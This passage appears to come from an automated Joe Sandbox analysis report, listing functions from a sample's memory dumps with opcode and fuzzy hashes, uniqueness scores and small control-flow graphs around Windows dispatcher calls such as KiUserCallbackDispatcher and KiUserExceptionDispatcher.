                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 53337f5d59e152346f79fdcc051b65064c48a5136f895ce2e3559d7c2add0168
                                                                                                                                                              • Instruction ID: 9cb8cd5c66a1269d9b86f224296f294d5a10081de6835bd6fdf87b425d75bc4c
                                                                                                                                                              • Opcode Fuzzy Hash: 53337f5d59e152346f79fdcc051b65064c48a5136f895ce2e3559d7c2add0168
                                                                                                                                                              • Instruction Fuzzy Hash: 98B15E71E1020ACFDB10CFA9C8857ADFBF2AF88314F588529F819E7254DB749985CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 050c67cbae734924032b1a3b38b7aef3f65d68d428161156ff1ad4401c7ad550
                                                                                                                                                              • Instruction ID: cc19e44d9a7232a1c49804efe5e8a2d7a55b059a3fc78545f879bdd870729f6d
                                                                                                                                                              • Opcode Fuzzy Hash: 050c67cbae734924032b1a3b38b7aef3f65d68d428161156ff1ad4401c7ad550
                                                                                                                                                              • Instruction Fuzzy Hash: E3B15070E1020ACFDB10CFA9D98579DBBF2AF88354F188129E815EB254DB7499C5CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              • Opcode ID: e034ba1eb63082123763a5e73d769990cede29dbcf3771152af2bffebbdf3384
                                                                                                                                                              • Instruction ID: b12a9e62cb9330be8a5586c779a6933ce9e5b726f5d29c953435f8dc47ad4ebd
                                                                                                                                                              • Opcode Fuzzy Hash: e034ba1eb63082123763a5e73d769990cede29dbcf3771152af2bffebbdf3384
                                                                                                                                                              • Instruction Fuzzy Hash: 424148B1D202198FDB10CFA9D88479EBBF5EB49310F248129E816EB384D7789985CF95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741839038.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3250000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              • Opcode ID: f923270cfb8721a62cb471f0f15f79a1e470a757761906cc8ac0476f6a1ac061
                                                                                                                                                              • Instruction ID: 21b1220914fa145307b231b520bf2539e8acc8778d69e16ad6f5167921cfdd85
                                                                                                                                                              • Opcode Fuzzy Hash: f923270cfb8721a62cb471f0f15f79a1e470a757761906cc8ac0476f6a1ac061
                                                                                                                                                              • Instruction Fuzzy Hash: F44157B1D102098FDB10CFA9D88479DFBF1EB49310F24812AE816EB384D7789985CF95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 03f8dfe11a1639e557558e220e2c159d7bf56d6bc320ea5fe991b17b8734649c
                                                                                                                                                              • Instruction ID: 932e3492782af7fb3443321d9264d7ed1a11395c3334f9e5adcc70d8ac740d4f
                                                                                                                                                              • Opcode Fuzzy Hash: 03f8dfe11a1639e557558e220e2c159d7bf56d6bc320ea5fe991b17b8734649c
                                                                                                                                                              • Instruction Fuzzy Hash: E0213030710215CFDB15DB78D59466E77F2EB88740F204169D506EB3A4DE799D41CBD0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0329C523
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                              • Opcode ID: fe30c844f0bc7da271f8a59754eda1519b96574add2fee4c8c2fc9873faab229
                                                                                                                                                              • Instruction ID: 1ce61e10d27a1e478d5ed1762ae8b307b6dbece2c68020cfe169066d4769ce38
                                                                                                                                                              • Opcode Fuzzy Hash: fe30c844f0bc7da271f8a59754eda1519b96574add2fee4c8c2fc9873faab229
                                                                                                                                                              • Instruction Fuzzy Hash: EF21697080939ACFDB01CFA9E9456EEBFB4AF09210F18449AE455B7282D7386944CFA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 937 329c4a0-329c537 KiUserCallbackDispatcher 941 329c539-329c53f 937->941 942 329c540-329c566 937->942 941->942
                                                                                                                                                              APIs
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(00000050), ref: 0329C523
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 945 3297ae2-3297aea 946 3297b08-3297b0b 945->946 947 3297b0d-3297b14 946->947 948 3297af5-3297af8 946->948 949 3297b2b-3297b31 947->949 950 3297b16 947->950 951 3297afa-3297b07 KiUserExceptionDispatcher 948->951 952 3297b21-3297b26 948->952 954 3297b1f 950->954 951->946 952->949 954->949
                                                                                                                                                              APIs
                                                                                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 03297B01
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DispatcherExceptionUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 6842923-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 955 3297af4 956 3297af5-3297af8 955->956 957 3297afa-3297b0b KiUserExceptionDispatcher 956->957 958 3297b21-3297b26 956->958 957->956 961 3297b0d-3297b14 957->961 962 3297b2b-3297b31 958->962 961->962 963 3297b16 961->963 964 3297b1f 963->964 964->962
                                                                                                                                                              APIs
                                                                                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 03297B01
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.741923834.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_3290000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DispatcherExceptionUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 6842923-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%
